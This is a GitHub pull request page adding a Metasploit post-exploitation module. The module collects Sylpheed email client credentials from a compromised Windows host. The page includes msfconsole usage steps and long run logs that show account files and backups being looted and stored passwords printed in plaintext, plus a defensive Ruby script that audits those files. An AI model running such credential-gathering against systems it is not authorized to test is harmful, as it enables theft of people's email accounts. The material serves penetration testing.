Add Sylpheed Email PackRat module #19171

Merged
4 commits merged into from May 17, 2024

The-Pink-Panther
Contributor

As a part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the Sylpheed Email Client. https://sylpheed.sraoss.jp/en/

This pull request will add two files:

  1. modules/post/windows/gather/credentials/sylpheed.rb
  2. documentation/modules/post/windows/gather/credentials/sylpheed.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/sylpheed
  4. Set SESSION 1
  5. run

Scenario

Using Sylpheed Email v3.17.0 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/sylpheed) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Sylpheed's Accountrc file found
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
[*] Sylpheed Accountrc downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_511987.bin

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_EXTRACTIONaccoun_507929.bin
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
[*] Sylpheed Accountrc.bak.1 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_329585.1

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_146899.1
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
[*] Sylpheed Accountrc.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_450482.bak

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_424899.bak
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
[*] Sylpheed Accountrc.bak.2 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_852103.2

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_342490.2
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
[*] Sylpheed Accountrc.bak.3 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_575350.3

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_038250.3
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
[*] Sylpheed Accountrc.bak.4 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_Sylpheedaccountr_780534.4

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_554415.4
[*] PackRat credential sweep Completed
[*] Post module execution completed
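
The run output above shows `password=` entries not only in `accountrc` but in every rotated `accountrc.bak*` copy. As an added example (not part of this PR or of PackRat), the Ruby audit below counts non-empty `password=` entries per file in a Sylpheed profile directory without printing the values. The one-pair-per-line layout is an assumption based on the extracted lines shown above, and the sample profile is constructed.

```ruby
require 'tmpdir'

# File names taken from the module output above: live file plus rotated backups.
ACCOUNTRC_PATTERNS = ['accountrc', 'accountrc.bak', 'accountrc.bak.*'].freeze

# Returns { file_name => number of non-empty password= entries }.
# The password values themselves are never stored or printed.
def audit_sylpheed_profile(profile_dir)
  report = {}
  Dir.glob(ACCOUNTRC_PATTERNS, base: profile_dir).sort.each do |name|
    path = File.join(profile_dir, name)
    next unless File.file?(path)

    count = 0
    File.foreach(path, encoding: 'UTF-8') do |line|
      # Assumption: one key=value pair per line, as in the output above.
      key, value = line.scrub.strip.split('=', 2)
      count += 1 if key == 'password' && !value.to_s.empty?
    end
    report[name] = count
  end
  report
end

# Files that still hold a stored password, including stale backups.
def files_with_passwords(report)
  report.select { |_name, count| count.positive? }.keys
end

# Constructed sample profile (not real data): the password has been cleared
# from the live file but is still present in two rotated backups.
def build_sample_profile(dir)
  live = "account_name=user@example.test\naddress=user@example.test\npassword=\n"
  old  = live.sub("password=\n", "password=constructed-secret\n")
  File.write(File.join(dir, 'accountrc'), live)
  File.write(File.join(dir, 'accountrc.bak'), old)
  File.write(File.join(dir, 'accountrc.bak.1'), old)
  File.write(File.join(dir, 'notes.txt'), "password=ignored\n") # not an accountrc file
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    build_sample_profile(dir)
    report = audit_sylpheed_profile(dir)
    report.each { |name, n| puts format('%-16s password entries: %d', name, n) }
    puts "Still holding passwords: #{files_with_passwords(report).join(', ')}"
  end
end
```

Clearing a stored password in the client does not clear it from the backup copies, so the audit should cover the whole profile directory, not only `accountrc`.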

@bwatters-r7 bwatters-r7 self-assigned this May 10, 2024
The-Pink-Panther and others added 3 commits May 15, 2024 14:58
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@bwatters-r7
Contributor

msf6 post(windows/gather/credentials/sylpheed) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Sylpheed's base folder found
[*] Found the folder containing specified artifact for accountrc.
[-] Sylpheed's Accountrc not found in msfuser's user directory

[-] Skipping accountrc since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/sylpheed) > show options

Module options (post/windows/gather/credentials/sylpheed):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/sylpheed) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Sylpheed's base folder found
[*] Found the folder containing specified artifact for accountrc.
[-] Sylpheed's Accountrc not found in msfuser's user directory

[-] Skipping accountrc since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/sylpheed) > 

@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in 8a68eeb May 17, 2024
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024
@bwatters-r7
Contributor

Release Notes

This adds a gather module leveraging Packrat targeting Sylpheed Email client.
